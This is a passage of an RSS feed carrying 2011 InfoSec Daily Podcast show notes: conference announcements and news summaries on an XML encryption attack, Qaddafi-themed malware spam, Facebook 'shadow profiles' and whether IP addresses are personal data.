	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boffins from the Ruhr University of Bochum (RUB) have devised a technique partly based on analysing error messages returned when carefully modified cipher text is submitted to a web service. By analysing the results of a sequence of error messages it is possible to decrypt encrypted XML-based data elements, H Security </span><a href="http://www.h-online.com/security/news/item/Researchers-XML-encryption-standard-is-insecure-1364074.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reports</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The official W3C XML encryption specification is designed to allow the secure transmission of information between different e-commerce and financial systems. The attack is limited to where AES is used for encryption in the cipher-block chaining (CBC) mode; other techniques, such as using an RSA key and X.509 certificates, are not susceptible.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cryptoboffins argue their research shows the standard is insecure and needs to be updated. The researchers, Juraj Somorovsky and Tibor Jager, plan to present their research at the ACM Conference on Computer and Communications Security (</span><a href="http://www.sigsac.org/ccs/CCS2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ACM CCS 2011</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) in Chicago.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/shocker-scammers-exploit-death-former-libyan-ruler-102111"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/shocker-scammers-exploit-death-former-libyan-ruler-102111</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In one of the least surprising computer security news events of 2011, the death of longtime Libyan despot, and self-proclaimed &quot;African King of Kings&quot; Colonel Muammar Qaddafi spawned a slew of online scams.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Within hours of the dictator&#39;s capture and death at the hands of Libyan rebels, security firms spotted spam e-mail proffering malicious links and attachments, many claiming to be grisly, Qaddafi death-photos. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One fraudulent email purports to be an AFP news article containing photos of Qaddafi&rsquo;s dead body, but instead delivers a malicious file targeting Windows users, </span><a href="http://nakedsecurity.sophos.com/2011/10/21/malware-attack-poses-as-bloody-photos-of-gaddafis-death/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Naked Security reported</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online scams built on the death of celebrities or major news events are common. Already this year, the deaths of Steve Jobs, Osama bin Laden, Amy Winehouse, and Elizabeth Taylor have spawned malicious campaigns targeting the curious online. In the case of Qaddafi, the easy availability of actual grisly photo of the leader&#39;s capture and death may make it easier for attackers to lure victims into clicking on attachments. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-500-shadow-profiles-son-of-stuxnet-cryptoboffins-live-from-hack3rcon/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2994/0/infosec-daily-podcast-episode-500.mp3" length="28212181" type="audio/mpeg" />
		<itunes:duration>0:58:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 500 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Keith Pachulski, Dr. Bonez and Varun Sharma.
	Announcement[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 500 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Keith Pachulski, Dr. Bonez and Varun Sharma.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.foxnews.com/scitech/2011/10/21/facebook-building-shadow-profiles-non-members-experts-allege/
	Eight hundred million users are not enough. Facebook, the world&#39;s biggest social network, is now building profiles of non-users who haven&#39;t even signed up, an international privacy watchdog charges.
	The sensational claim is made in a complaint filed in August by Ireland&#8217;s Data Protection Commissioner. It alleges that users are encouraged to hand over the personal data of other people &#8212; including names, phone numbers, email addresses and more &#8212; which Facebook is using to create &#34;extensive profiles&#34; of non-users.
	Facebook categorically denies the allegation, but experts tell FoxNews.com that it could well be true.
	&#8220;There can be little doubt that Facebook collects from its current users information about individuals who are not currently Facebook users, and collects from its current users information about other Facebook users,&#8221; said Kelly Kubasta, who heads the Dallas law firm Klemchuk Kubasta&#8217;s social media division.
	Ciara O&#39;Sullivan, a spokeswoman for Ireland&#39;s Office of the Data Protection Commissioner, told FoxNews.com that its audit of Facebook Ireland&#39;s privacy policies was part of a &#34;statutory investigation&#34; that the office anticipates will lead to immediate changes.
	&#34;The Office of the Data Protection Commissioner will be commencing a comprehensive audit of Facebook Ireland before the end of the month,&#34; O&#8217;Sullivan said.
	But Facebook denies that it is creating &#34;shadow profiles&#34; and tracking users and non-users alike.
	&#8220;Facebook does not track users across the web,&#8221; a Facebook spokesman said in a statement to FoxNews.com. &#8220;We use cookies on[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 499 &#8211; IP == PII?, Diasble Siri, Nasdaq Update, DHS Appointment, Drive-by Attacks &amp; Drone Update</title>
		<link>http://www.isdpodcast.com/episode-499-ip-pii-diasble-siri-nasdaq-update-dhs-appointment-drive-by-attacks-drone-update</link>
		<comments>http://www.isdpodcast.com/episode-499-ip-pii-diasble-siri-nasdaq-update-dhs-appointment-drive-by-attacks-drone-update#comments</comments>
		<pubDate>Fri, 21 Oct 2011 00:41:50 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2990</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 499 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad and Keith Pachulski. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 499 for October 20, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad and Keith Pachulski.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2011/10/20/are_ip_addresses_personal_data/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/10/20/are_ip_addresses_personal_data/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Let&rsquo;s revisit that old chestnut: &ldquo;Is an IP address you use in an internet session personal data about you?&rdquo; The reason: I have just come across two legal references which relate to copyright infringement where the argument that an IP address is personal data </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">was</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> accepted.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first reference I found was the Monetary Penalty Notice that ACS Law obtained (and the &pound;200K fine that later became a &pound;1k fine&#8230;). The company used to send ISPs a list of IP addresses suspected of being involved in breaches of copyright on a regular basis. (The company went out of business because of its poor security, which is why the eventual penalty was reduced to &pound;1K).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the ACS Law Monetary Penalty Notice, the Information Commissioner&#39;s Office (ICO) clearly states:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Commissioner understands that the data requests sent to each ISP by the data controller (in this case) were for information populating a spreadsheet containing hundreds and sometimes thousands of IP addresses. &#8230; ISPs responded to the data controller by returning the spreadsheet with all the existing data, together with the name and address of the registered account holder that they had input alongside each entry.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So the ISPs mentioned above, presumably because they have blocks of IP addresses specifically allocated to them, were able to provide a link between a requested IP address and a specific individual account-holder. In this way, the IP address formed part of the personal data each ISP had in its possession.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This point was reinforced with a judicial review concerning the Digital Economy Act 2010, where it was claimed by many organiSations that some regulations enacted by Government were incompatible with a number of provisions of EU law. One part of this argument related to the Data Protection Directive (DPD) 95/46/EC.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The judgement states that, as common ground between the parties, an IP address is personal data. In detail, it states that:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is common ground that&#8230; (various provisions in the Digital Economy Act)&#8230; are likely to require ISPs to process &ldquo;personal data&rdquo; within the meaning of Articles 2(a) and (b) of the DPD. The ISP must link the IP address provided by the copyright owner with an individual subscriber&rsquo;s name and address, and write to them and compile lists&#8230; [that can be supplied to Third Parties &ndash; paragraph 152].</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So suppose an ISP allows other organisations to capture or monitor a user&rsquo;s IP address, eg, for the purpose of behavioral marketing. As the ISP is processing personal data (see above), isn&rsquo;t it allowing part of the personal data under its control (eg, the IP address it has been allocated, and possibly owns, which also relates to the browsing habits of a known individual) to be used for third party marketing?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As all Tribunal determinations on third party marketing have stated that this needs the prior consent of each data subject (ie, each and every account-holder), shouldn&rsquo;t the ISP be doing something to alert or protect its customers from the use of their IP addresses for third party marketing? Like getting their consent, perhaps?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now look at the issue from the standpoint of those behavioral marketeers that arrange for a pop-up box to appear after monitoring IP addresses; for convenience, I show examples of these boxes posted on Wiki. What is the purpose of the pop-up box? Answer, of course, &ldquo;marketing&rdquo;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Note that many pop-up boxes shown provide links to enable direct contact with the customer. So where organisations are using/monitoring the IP address to identify potential leads, they </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">know</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that identifying information about an individual is likely to come into their possession.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If this is the case, then this too falls within the UK Act&rsquo;s definition of personal data. It follows that personal data is being processed for a marketing purpose, without the data subject having been given the advance choice to opt out of the marketing purpose (eg, in a fair processing notice).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are those who would argue that an IP address, by itself, does not identify the individual. In support, they might quote recent judgements about &ldquo;anonymous statistics&rdquo;, which appear to suggest that the disclosure of anonymised information, extracted from personal data, is not a release of personal data.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I argue that the position the release of these &quot;anonymous statistics&quot; and IP addresses is not the same and can be distinguished very easily as follows.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Consider the</span><a href="http://www.bailii.org/ew/cases/EWHC/Admin/2011/1430.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ProLife Alliance Freedom of Information request</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to the Department of Health (DoH) for the release of abortion statistics concerning the number of late-term abortions. The DoH refused the request and claimed that the requested information was personal data, the Information Commissioner said the statistics were not personal data, the Tribunal said they were personal data, and Cranston J,</span><a href="http://www.bailii.org/ew/cases/EWHC/Admin/2011/1430.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span 